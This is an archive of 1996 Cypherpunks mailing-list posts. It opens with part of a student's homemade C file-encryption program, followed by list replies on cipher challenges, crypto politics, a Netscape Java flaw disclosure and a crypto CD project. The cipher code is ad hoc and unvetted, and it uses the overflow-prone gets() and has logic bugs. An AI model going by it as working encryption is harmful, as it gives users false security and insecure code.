		initblocks();
		decrypt();
		CopyBack();
  }
else
	printf("%s was not an option",ed[0]);

closefiles();
}

//**************************************************************************//
// input()              Takes in all inputs                             
    //
//**************************************************************************//
void input()
{
	char 	  vkey[80];
	char    c;

	for (i = 0; i < 80; i++)
		{
			key[i] = '';
			vkey[i] = '';
		}

	printf("\nEnter Filename:");
	gets(ifn);
	printf("(E)ncrypt or (D)ecrypt?:");
	gets(ed);

	printf("Enter Key:");
	i = 0;
	int startx = wherex();
	do {
		if (kbhit())  {
			 c = getch();

			 if (c == 8)
			 {
				if (wherex() != startx)
					{
						key[i] = '';
						i -= 1;
						key[i] = '';
						
gotoxy(wherex()-1,wherey());
						printf(" ");
						
gotoxy(wherex()-1,wherey());

					}
			 }
			 else
				{
					if (c != 13)
						{
							key[i] = c;
							i++;
							printf("þ");
						}
					else
						break;
				}

			 }
		} while (c != 13);

	flushall();
	printf("\nVerify key:");
	startx = wherex();
	i = 0;
	c = 0;
	do {
		if (kbhit())  {
			 c = getch();

			 if (c == 8)
			 {
				if (wherex() != startx)
					{
                  vkey[i] = '';
						i -= 1;
                  vkey[i] = '';
						
gotoxy(wherex()-1,wherey());
						printf(" ");
						
gotoxy(wherex()-1,wherey());

					}
			 }
			 else
				{
					if (c != 13)
						{
							vkey[i] = c;
							i++;
							printf("þ");
						}
					else
						break;
				}

			 }
		} while (c != 13);

	if (strcmp(key,vkey) != 0)
		{
			printf("\nKeys were not the same. They need to 
be");
			exit(EXIT_SUCCESS);
		}
	if (strlen(key) <= 0)
		{
			printf("\nThe key was blank, it needs to have 
some characters.");
			exit(EXIT_SUCCESS);
		}
printf("\n");
}

//**************************************************************************//
// openfiles(void) --       Opens all files                             
    //
//**************************************************************************//
void openfiles(void)
{
infile  = open(ifn,O_BINARY | O_RDONLY);
if (ed[0] == (('e') | ('E')) )
	{
	  outfile = open(ifn,O_BINARY | O_WRONLY);
	}
else
	{
		  chmod("KRYPT000.TMP",S_IWRITE);
		  unlink("KRYPT000.TMP");
		  outfile = open("KRYPT000.TMP", O_BINARY | O_RDWR | 
O_CREAT | O_TRUNC | S_IWRITE);
	}

}

//**************************************************************************//
//                       Closes All Files                               
    //
//**************************************************************************//
void closefiles(void)
{
if (ed[0] == (('e') | ('E')) )
  {
	close(outfile);
	close(infile);
  }
else
	{
		close(backfile);
		close(infile);
	}

}


//**************************************************************************//
//                      Main Encryption Routine                         
    //
//**************************************************************************//
void encrypt(void)
{
char buf[BLOCK];
float blocks = 0;
long sizeoffile = filelength(infile);
long numread;
long maxblocks = sizeoffile / BLOCK;
if (maxblocks == 0) maxblocks = 1;
printf("\nEncrypting:");
x = wherex();

while ((numread = read(infile,buf,BLOCK)) > 0 )
	{
		BKHavg = (blocks * Kavg) + Havg;
		for(i = 0; i < numread; i++)
			{
			  buf[i] = buf[i] + floor(9845845*cos((KEY[i]+
				BSH[i]) * (i+BKHavg)));
			}

		gotoxy(x,wherey());

		int pd = floor(blocks/maxblocks*100 + 1);
		printf("%d%",pd);

		write(outfile,buf,numread);
		blocks++;
	}
gotoxy(x,wherey());
printf("100%");
write(outfile,ESuperHash,HASHSIZE);
}
//**************************************************************************//
//                      Copy Back For Decryption                        
    //
//**************************************************************************//
void CopyBack(void) {

backfile = open(ifn,O_BINARY | O_WRONLY | O_TRUNC);
char buf[BLOCK];

long pos;
long size = filelength(outfile) - HASHSIZE;
long blocks = 0;
int numread;
long maxblocks = size / BLOCK;
if (maxblocks == 0) maxblocks = 1;

printf("\nRemoving encryption block:");
x = wherex();
lseek(outfile, 0L, SEEK_SET);
  do {
	 numread = read(outfile,buf,BLOCK);
	 pos = tell(outfile);

	 if (pos > size)
		{
		  write(backfile, buf,numread - (pos - size));
		  break;
		}
	 else
		{
		  write(backfile, buf, numread);
		}

	 blocks = blocks+1;
	 gotoxy(x,y);
	 int pd = floor(blocks/maxblocks*100 + 1);
	 printf("%d%   ",pd);

  } while (pos != size);
  close(outfile);
  chmod("KRYPT000.TMP",S_IWRITE);
  unlink("KRYPT000.TMP");


}
//**************************************************************************//
//                      Main Decryption Routine                         
    //
//**************************************************************************//
void decrypt(void) {
char buf[BLOCK];
float blocks = 0;
long sizeoffile = filelength(infile);
long numread;
long maxblocks = sizeoffile / BLOCK;
if (maxblocks == 0) maxblocks = 1;
printf("\nDecrypting:");
x = wherex();

while ((numread = read(infile,buf,BLOCK)) > 0 )
	{
		BKHavg = (blocks * Kavg) + Havg;
		for(i = 0; i < numread; i++)
			{
				buf[i] = buf[i] - 
floor(9845845*cos((KEY[i]+
				  BSH[i])*(i+BKHavg)));

			}

		gotoxy(x,wherey());

		int pd = floor(blocks/maxblocks*100 + 1);
		printf("%d%",pd);

		write(outfile,buf,numread);
		blocks++;
	}
gotoxy(x,wherey());
printf("100%");


}
//**************************************************************************//
//                         SuperHash Procedure                          
    //
//									
									
							 //
// the idea here is to get a block of totally unpredictable bytes,      
    //
// if anyone has any 'true random number generators' stick em here	
       //
//	this just pulls in HASHSIZE bytes from random positions from the 
file,   //
//	the idea being that they would have to know what the whole file 
was      //
//	in the first place to guess these values                        
         //
//									
									
							 //
//**************************************************************************//
void superhash(void)
{
printf("Generating System/Time/File specific SuperHash:");
x = wherex();

	long MaxPos = filelength(infile) - 1;
	char hbuf;
	int keylen = strlen(key);
Havg = 0;
for (i = 0; i < HASHSIZE; i++)
	{
			long SeekValue = ((93617583 * random(32000)) * 
key[i % keylen]) % MaxPos;
			if (SeekValue < 0) SeekValue *= -1;

			lseek(infile,SeekValue, SEEK_SET);
			read(infile,&hbuf,1);

			SuperHash[i] = floor(923723723 * cos(random(256) 
* hbuf * key[i % keylen]));
			ESuperHash[i] = SuperHash[i] + floor(989898989 * 
sin(key[i % keylen])+i);
			Havg = Havg + SuperHash[i];

			printf("%d     ",random(256));
			gotoxy(x, wherey());
	}
if ((key[SuperHash[5] % keylen] + (key[SuperHash[3] % keylen] / 10)) != 
0)
	{
		Havg = Havg / (key[SuperHash[5] % keylen] +
			(key[SuperHash[3] % keylen] / 1000));
	}
else
	{
		Havg = Havg / 7.2;
	}


lseek(infile, 0L, SEEK_SET);
}

//**************************************************************************//
//grabhash()            Grab ESuperHash from file                       
    //
//**************************************************************************//
void grabhash()  {
printf("Grabbing SuperHash Values...");
long sizeoffile = filelength(infile);
int keylen = strlen(key);

lseek(infile,sizeoffile - HASHSIZE,SEEK_SET);
read(infile,ESuperHash,HASHSIZE);
Havg = 0;
for (i = 0; i < HASHSIZE; i++)
  {
	 SuperHash[i] = ESuperHash[i] - floor(989898989 * sin(key[i % 
keylen])+i);
	 Havg = Havg + SuperHash[i];
  }
Havg = Havg / key[SuperHash[5] % keylen];
lseek(infile, 0L, SEEK_SET);
}

//**************************************************************************//
//initblocks()       Dumps small hash arrays into big BLOCK arrays      
    //
//**************************************************************************//
void initblocks(void)  {
long total = 0;
int keylen = strlen(key);

for (i = 0; i < keylen; i++)
	{
		total += key[i];
	}

Kavg = total / keylen + total;

for (i = 0; i < BLOCK; i++)
  {
	 KEY[i] =  key[i % keylen];
	 BSH[i]  = SuperHash[i % HASHSIZE];
  }



}
----------

seeya - thanks

-- 
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 25 Mar 1996 07:19:43 +0800
To: cypherpunks@toad.com
Subject: The Crow meets the Troll...
Message-ID: <v02120d01ad7b850d9d67@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:23 PM 3/24/96, Larry Detweiler wrote:

> Look, newbie, <troll>

Heees Baaack!

My guess is that Jim Bell's assassination server has gone up, and
Detweiler's psychopharmacologist was the first hit on the list...

Of course, given the quality of the post Larry's responding to, Mr. Mott
may be a "tentacle" of Detweiler himself. ;-)

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 25 Mar 1996 11:15:35 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: LIST OF SHAME VOLUNTEERS
Message-ID: <Pine.SUN.3.91.960324181903.22630A-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

As promised, below is the list of folks who have asked to be put
on Mr/Ms Anonymous' LIST OF SHAME.  In addition, I am including
one volunteer who supports Mr/Ms Anonymous...sort of.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

LIST OF SHAME VOLUNTEERS

Dan Harmon
Jim Ray
Robby Havasy
Perry Metzger (didn't volunteer, exactly, but wrote:  "Perry, Who 
	is disappointed that he didn't make the "LIST OF SHAME", 
	but understands that perhaps he hasn't done enough to 
	oppose controls on cryptography. I'll work harder, and 
	hopefully you will denounce me soon."
Damaged Justice <frogfarm@yakko.cs.wmich.edu>
brianh@u163.wi.vp.com
Rich Graves
Brad Shantz
Kevin L Prigge
Jim Gillogly
Robert Hettinga
David Macfarlane
Brad Shantz
Mark Aldrich
Charles Gimon
Jamie Lawrence
Doug Hughes
David K. Merriman
Lucky Green
Raph Levien
Bill Frantz
Paul E Robichaux
Glenn Powers
Brian D Williams
"Vladimir Z. Nuri"  !!!!!

SUPPORTERS OF MR/MS ANONYMOUS

E. Clark, who wrote:

Subject: A vote for ANON's position [with reservations]

Supporters of the Leahy Bill are, to me, well-intentioned dupes.

I've lurked on this list under this and a previous usename since the 
list was a couple months old. I came here to learn crypto, not debate 
politics. And, while the urge has often been all but overwhelming, 
I've for most part kept my silence, prefering back channels to 
posting on the list.

The Politics of the Absurd has in the last year or three found me in 
agreement with figures on the national scene whose pockets I would
decline to piss were their balls on fire. Nor am I quite comfy siding
with anonymous in regard to the Leahy Bill, but...

I neither like nor trust the bill and, after the Digital Telephony 
Bill and its manner of passage, my trust in the good senator is zero.

I am still a little puzzled why there was so little discussion on the 
list of what Freeh might have told the congresscritters that long 
summer when he seems to have visited them all. Sort of makes this 
leftie wonder if, just maybe, the rightwing conspiracy boys who claim 
the unusual number of congressional dropouts was the result of FINCIN 
findings might not have stumbled upon a quarter-grain of truth.

While I applaud the efforts of those working for the cause in the 
political sphere, I have scant faith. Business will be on the side of 
privacy until it gets what it wants, then walk away from individual 
concerns for privacy, etc.

I've always enjoyed your posts and sense of humor. Apologies for 
going on at length.

e. clark
---


Comments, Anonymous?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 25 Mar 1996 08:21:21 +0800
To: cypherpunks@toad.com
Subject: Re: apology - here is C source code
Message-ID: <v02120d02ad7b89c8b9f7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:00 PM 3/24/96, Jack Mott wrote:

> I apologize to everyone for the binary posting, I figured it was small
> enough to not cause problems.  Here is the source....

<snip> I am a junior in high school ...
<snip>

> ---------------
> // encryption program - constructive flames appreciated

 <snip>

Looks like I spoke too soon about the "tentacle" thing. My apologies.

Welcome, Mr. Mott.

I have no idea of the quality of your code, but you *do* write code, which
is a *good* thing around here (at least until the "coderpunks" flap).

You should be aware, however, that even though there are many active
cryptographers on this list, most of whom *do* write code, that people
probably won't fall over themselves to look at your first effort. As people
say, "cryptography is hard". It's a science. As such, it takes a long time
to get to the point where you're actually improving the state of the art.

Don't let that stop you from coding new stuff. Far from it. Especially if
you're coding strong cryptographic software based on algorithms of proven
reputation. Lord knows, there are lots of potentially good algorithms out
there that need implementation.

My suggestion is that you put out a request for correspondence so that
people could talk to you about your new work privately, in e-mail. That's
because this list periodically gets unsolicited code like yours, and most
of it isn't worth the time to read, much less do a proper vetting. So it
tends to get trashed upon receipt. Getting together with a bunch of people
in your own shoes may be the best way to start, and I'm sure there are one
or two others on this list who are plinking around implementing stuff just
to see what it looks like.

Nonetheless, the trick, it seems to me, (and I'm a poor person to ask,
because I couldn't code my way out of a paper bag) is to keep plugging away
at stuff like your application, because cryptography is the principal
technology of internet commerce, among other things.

You also might want to look at the cypherpunks archives, read Tim May's
"cyphernomicon" FAQ, and read some good crypto books, not the least of
which is "Applied Cryptography" by Bruce Schneier. If you've done all of
that, and have written your code afterwards, then you probably have made a
nice start. If you haven't looked at the above resouces, you might want to,
and check your new code in light of that new information, and give yourself
a head start on what others might say. If they looked at your code, I mean.
;-).

Anyway, welcome to cypherpunks. It's great to have someone of the next
generation on board!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Mar 1996 04:26:34 +0800
To: cypherpunks@toad.com
Subject: Why and how people work for free on "challenges"
Message-ID: <ad7b38320002100490f1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 AM 3/25/96, Black Unicorn wrote:

>I think, should you have the right attitude, many people here will be
>happy to review your source code, given some pre-conditions.  Mr. May
>summed these up quite well only days ago in the IDG (or whatever)
>snakeoil thread.  I would suggest you take a gander at his post on the
>subject.  Briefly, (and I hope I'm not butchering his points to
>bitterly), he indicated that unless you had hit on most of the basic
>source material to begin with (applied cryptography for example), and
>really knew a bit about the subject, most people wouldn't much care to
>pay attention to you.
>
>I think, however, that if you know your stuff, and you release the source
>code to the list, many people here will be open minded enough to take a
>good look, give you some pointers, perhaps even improve your work.

While I'm certainly no expert in cryptanalysis, the situation with "Can you
break this?" challenges is a special case--and an important one--of
challenges in general.

To cut to the chase, why do challenges work at all? And under what
circumstances?

A challenge that grabs the attention of key people can result in vastly
more effort being put into a task than could be effectively marshalled
almost any other way. An example will make this clearer: human-powered
flight. A challenge prize was offered for the first human-powered flight
around some particular set of pylons...I don't recall the details, but it
was heavily publicized some years back. Vast amounts of effort were put
into this.

Flight, like cryptanalysis, has long been a fairly ideal area for such
challenges. But, like crypto, there are some things that work for such
challenges (and some things that don't).

* the challenge should come from a reputable group or individual (casual
challenges of the "I dare you" sort thus get winnowed out)

* the challenge should involve something "interesting"....first solo flight
across the Atlantic, first human-powered flight, etc.

* the challenge needs to come at the right time. There would be little
interest, for example, in a challenge about the first fusion-powered flight
(excluding solar-powered, which was a challenge).

There is, for example, likely to be little or no interest if I pose this
challenge: "I challenge any of you to fly from San Francisco to Canberra to
Taipei and back to San Francisco without once saying a single word." The
challenge needs to arouse wide interest.

In crypto, there have been _many_ challenges which basically meet the sorts
of criteria I listed. Ralph Merkle offered a prize for anyone who could
break the knapsack algorithm (iterated, or somesuch...cf. Schneier etc. for
details). This was already an important issue, so the challenge was taken
seriously. Shamir ultimately claimed the prize. Later prizes followed a
similar trend.

And there were challenges by Rivest, involving RSA, which an MIT team
ultimately broke (RSA-129). Our own Derek Atkins was involved (and he may
be able to say more about why RSA challenges are more interesting to
students and faculty than are mere "Here's my new cipher" challenges. And
the CIA even has a challenge involving a statue or seal outside its Langley
headquarters building. Not to mention the Beale Cipher.

So, a reasonable challenge will likely generate a lot of free effort. Even
a $1000 prize, if combined with other factors, will draw attention. The
prize itself is not important; it is the defining of precise conditions for
success that is important and interesting.

The recent "I challenge Cypherpunks to break our unbreakable system"
challenge from Snake Oil Associates failed on several grounds. There was no
real evidence the algorithm was "interesting," there was no evidence the
folks at SOA were competent and worth going up against, the conditions of
the challenge were suspect, and there was no substantive prize making
effort potentially rewarding. (The offered to sell the company for $1 to
whomever broke their system, but now seem to have reneged, predictably
enough.)

Even so, a couple of Cypherpunks analyzed their system (parts of which were
secret, usually another killer for effective challenges!). In less than a
day, a crack was reported. (The motive here was yet another one, not listed
above. Namely, the desire to go "gunning" for the incompetent newbies and
cretins.)

So, well-planned challenges can be effective. Naive and puerile challenges
of the sort "I dare you to break this! I double-dog dare you to!" are
rarely treated seriously. Not too surprising.

Bayesian statistics says that someone we've never heard from before is
unlikely to be producing a new cipher which is interesing enough to try to
break. A new cipher from Rivest or the like would of course be somewhat
more likely to be analyzed (though even these ciphers are rarely analyzed
directly).

>Take a look at Mr. May's cyphermonicon, (anyone have the URL/FTP handy
>for our new friend?)

The URL I like is http://www.oberlin.edu/~brchkind/cyphernomicon/. Though,
as I have noted in other threads, I have very little if anything on
"cryptanalysis" per se. Modern ciphers are just not very amenable to
attacks via conventional cryptanalysis. (And symmetric-key ciphers are
really, really old news.)


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Mon, 25 Mar 1996 12:06:40 +0800
To: cypherpunks@toad.com
Subject: RISKS: Princeton discovers another Netscape security flaw
Message-ID: <v01540b01ad7bc72800a7@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Posted on RISKS:

----------------------------------------------------------------------

Date: Fri, 22 Mar 1996 17:27:56 -0500
From: Ed Felten <felten@CS.Princeton.EDU>
Subject: Java/Netscape security flaw

We have discovered another serious security flaw in the Java programming
language, which allows a malicious Java applet running under Netscape
Navigator (version 2.0 or 2.01) to execute arbitrary machine code.  We have
implemented an applet that exploits the flaw to remove a file.  Until a fix
is issued, Netscape users can protect themselves by disabling Java in the
Security Preferences dialog.

At present we are not releasing technical details about the flaw.  We will
announce the full details later; some of the details will also appear in our
upcoming paper in the proceedings of the IEEE Symposium on Security and
Privacy, to be published in May.  Our paper also contains an overall
analysis of Java's security.  For an advance copy of the paper, send mail to
felten@cs.princeton.edu.  The paper will be available in about a week.

[Note that the "security enhancements" announced by Netscape in version 2.01
of Netscape Navigator do not fix this flaw.  They fix two separate flaws found
last month, one found by us (RISKS-17.77) and independently by Steve Gibbons,
and the other found by David Hopwood (RISKS-17.83).]

For more information, see http://www.cs.princeton.edu/~ddean/java, or contact
Ed Felten at (609) 258-5906 or felten@cs.princeton.edu.

Drew Dean, Ed Felten, Dan Wallach, Dept of Computer Science, Princeton Univ.

   [See the CIAC item at the end of this issue for some background
   on the earlier problems.  PGN]

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 25 Mar 1996 09:09:03 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Re: private key encryption program for you to hack at
In-Reply-To: <3155621F.5FA2@iconn.net>
Message-ID: <Pine.SUN.3.91.960324194847.3805C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Mar 1996, Jack Mott wrote:

> Ok, I have been working on this for a while, and I wanted to let you 
> guys have a go at it. I wrote a private key encryption program that I 
> think should be hard to break, I will provide you with the EXE (MS DOS) 
> file, some ciphertext, AND a big chunk of plaintext. The key is not 
> ridiculously large, but it won't be anything obvious so don't bother 
> brute forcing. 

I'm not sure anyone will bother brute forcing or anything else given your 
approach.  Many c'punks take offense at being used like unpaid crypto 
consultants.  A good portion of people on this list bill hefty fees for 
their time (or should).

This is not freecryptanalysis@toad.com.

I think, should you have the right attitude, many people here will be 
happy to review your source code, given some pre-conditions.  Mr. May 
summed these up quite well only days ago in the IDG (or whatever) 
snakeoil thread.  I would suggest you take a gander at his post on the 
subject.  Briefly, (and I hope I'm not butchering his points to 
bitterly), he indicated that unless you had hit on most of the basic 
source material to begin with (applied cryptography for example), and 
really knew a bit about the subject, most people wouldn't much care to 
pay attention to you.

I think, however, that if you know your stuff, and you release the source 
code to the list, many people here will be open minded enough to take a 
good look, give you some pointers, perhaps even improve your work.

I know, however, that almost no one is going to go for that "crack this 
for me please" crap unless there is a bonded cash award attached.

To much time, nothing in it for us.

Take a look at Mr. May's cyphermonicon, (anyone have the URL/FTP handy 
for our new friend?)

In sum, read the basic source material, know your stuff, release the source, 
don't be coy.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 25 Mar 1996 19:08:17 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why and how people work for free on "challenges"
In-Reply-To: <ad7b38320002100490f1@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960324223548.9177A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Mar 1996, Timothy C. May wrote:

> At 12:56 AM 3/25/96, Black Unicorn wrote:

[...]

> >I think, however, that if you know your stuff, and you release the source
> >code to the list, many people here will be open minded enough to take a
> >good look, give you some pointers, perhaps even improve your work.
> 
> While I'm certainly no expert in cryptanalysis, the situation with "Can you
> break this?" challenges is a special case--and an important one--of
> challenges in general.
> 
> To cut to the chase, why do challenges work at all? And under what
> circumstances?

[...]

> * the challenge should come from a reputable group or individual (casual
> challenges of the "I dare you" sort thus get winnowed out)
> * the challenge should involve something "interesting"....first solo flight
> across the Atlantic, first human-powered flight, etc.
> * the challenge needs to come at the right time. There would be little
> interest, for example, in a challenge about the first fusion-powered flight
> (excluding solar-powered, which was a challenge).

[...]

Points well taken.

At the risk of "me too"ing, I concur.

Challenges to indeed serve an important role, and I hardly meant to 
discourage those which have been the subject of careful pre-planning and 
forethought.

> --Tim May

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 25 Mar 1996 14:50:13 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: RISKS: Princeton discovers another Netscape security flaw
Message-ID: <v02120d2cad7beeaa81ec@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:48 3/24/96, Perry E. Metzger wrote:
> When you build something large and complex, and
>you require that the entire thing work for you to be secure, there are
>just too many failure modes.

That just about sums it up.

Chisel these in granite:

o Thou shall not execute untrusted code. Java or no Java.
o Privileges that an user doesn't have can't be abused.
o The only safe firewall is a non-networked computer.
o A feature that doesn't exist won't introduce security holes.

Yes, I know that there is a balance between functionality and security.
Where to draw the line depends on the application.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Mar 1996 01:20:46 +0800
To: Steven Weller <stevenw@best.com>
Subject: Re: RISKS: Princeton discovers another Netscape security flaw
In-Reply-To: <v01540b01ad7bc72800a7@[206.86.1.35]>
Message-ID: <Pine.SOL.3.91.960324230818.28103B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



A pound to a bucket of ferrets this is another visit from our good friends
Capt. Overrun  and the static buffers, in which case it's more an indictment 
of C 

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Mar 1996 15:55:10 +0800
To: Sandy Sandfort <cypherpunks@toad.com>
Subject: Re: LIST OF SHAME VOLUNTEERS
Message-ID: <2.2.32.19960325072712.0090d5b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:51 PM 3/24/96 -0800, Sandy Sandfort wrote:

>As promised, below is the list of folks who have asked to be
put
>on Mr/Ms Anonymous' LIST OF SHAME.  In addition, I am
including
>one volunteer who supports Mr/Ms Anonymous...sort of.

[List deleted]

Add me to the list as well.

As someone put it, you do not abandon those you admire just
becuase you do not agree with them.  (Or something like
that...)

The people who anon are ranting about have done real work for
the cause of free crypto.  I have not seen any such "good
works" from Mr. Anon.

I think that the Leahy bill is very flawed.  It has some strong
room for abuse by the government.  it will also bring the
issues into the public eye and maybe even get them to think
about some of the issues revolving around the sillyness of
ITAR. (Or at least one can hope.)  But then, I think we are
about to move into a new dark ages of the net anyways...  The
net has become an officially government recognised buzzword,
thus ensuring its doom.  (But I am a pessimist... So there!)



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMVZIxOQCP3v30CeZAQEVYgf/RWTsRTVikFXHhTUiRxxmoj8yoIitPeOu
7O7q9VkrZ2S6Jc9IBffGxa53N/gtXDKvUkdLN8VE2lx1DjYsGI1eMcVTZ/mRS269
ceRuEWZ1hikJlak221mEbw5jgpSsvx7Ib72LLGaOtKx8UitEymdkFQ2nQHH1jGZr
1aldARW2yH9YtgUdHWplVMJaxrcArzKCMPMYyJyU4hrI6HB2RIMDMSj6vivjhm8U
prey01OJxJiR0+6ZFjPmTVPFTXBdenubVS/OGHsaIe+ex5ogJLNMe5uIsiVKaReC
t+K0o3T3PQj2R9ytOjnIT/6Cq22Ye7kfkmOS3Oovk6skkF2pB/z7Hw==
=n7km
-----END PGP SIGNATURE-----
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Mar 1996 17:27:56 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: RISKS: Princeton discovers another Netscape security flaw
In-Reply-To: <v01540b01ad7bc72800a7@[206.86.1.35]>
Message-ID: <199603250448.XAA29939@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Steven Weller writes:
> 
> Posted on RISKS:
> 
> From: Ed Felten <felten@CS.Princeton.EDU>
> 
> We have discovered another serious security flaw in the Java programming
> language,

There is only one way to fix Java -- which is to turn it off. The
hubris of the people who created it truly astounds me. After the
current flurry of obvious holes gets patched is the point when I'm
really going to worry, because thats when people are going to get
complacent until the one day when the big flaw is found by the good
guys, months after the bad guys found it.

Java security depends on

1) Perfect security model
2) Perfect implementation of the perfect security model
3) Nothing else in the surrounding system somehow undermining the
   perfect implementation of the perfect security model.

I don't believe humans are perfect.

When you design a system on the basis that humans are imperfect, and
you cut out functionality until you can fully understand the system
(say, because the sources are down to a single page of C) and you try
to restrict the damage that any possible failure mode could provide,
you will still sometimes make mistakes, but at least they won't be too
bad or too frequent. When you build something large and complex, and
you require that the entire thing work for you to be secure, there are
just too many failure modes.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bholiday <bholiday@trader.tlx.net>
Date: Mon, 25 Mar 1996 17:28:02 +0800
To: cypherpunks@toad.com
Subject: Crypto CD UpDate
Message-ID: <Pine.LNX.3.91.960324235254.7619A-100000@trader.tlx.net>
MIME-Version: 1.0
Content-Type: text/plain



Well given the somewhat enthusiastic response to my last post, I think 
I'll be safe enough in going ahead with plans for the CryptoCD. Thanks to 
everyone who responded, and I apologize that I can't address each of you 
individually.

Some points...

Copyrights: 

Obviously care will need to be taken to avoid publishing 
copyrighted materials, or publishing materials in violation of their 
distribution agreements. More later.

Size/Contents/Etc: 

The media and cost of writing the disks is the same for 50megs as for 500. 
If I/We can put together 500 megs of content, I will gladly put 500 megs 
on a CD, however this will honestly require some assistance by the crypto 
community.

Authors:

 OK, I had a number of authors suggest inclusion of their package on any 
forthcoming CD. I intend to have several machines hitting the net for 
aprox. 8-10hours a day over the next few weeks to gather up files for 
inclusion; however to speed things along it would be really great if 
authors could MIME or UUE their package and mail it to me, along with a 
return email address, and preferably a snail-mail address also. If you do 
send something for inclusion PLEASE include a breif note stating that you 
give permision to distribute the package as part of the CryptoCD package. 
If there is a license included in the package already (GNU, etc) you can 
just state that the package can be distributed according to the included 
license. I will include ANY package sent to me by an author, provided 
that space is available, however if the program(s) seem unfamiliar or 
questionable, I may put them in a Contrib directory with a strong disclaimer.

If you ARE NOT a software author, but you think something should be included, 
send me email (privately, not to the list). Include a URL for the file, or 
better yet, include the file in MIME or UUE format. Or be really nice and 
snail-mail it. The first person to send me any particular 
file or group of files (not a URL) will be duly thanked in a CREDITS file 
on the CD. This is your chance to be famous for absolutely no reason at all.
If you don't want to be famous just say so and I'll forget I ever got 
email from you.

Errata:

I'll be putting up a web page in the next few days which will have 
daily status updates (oh boy) including an LS-lr of the CD-so-far. 
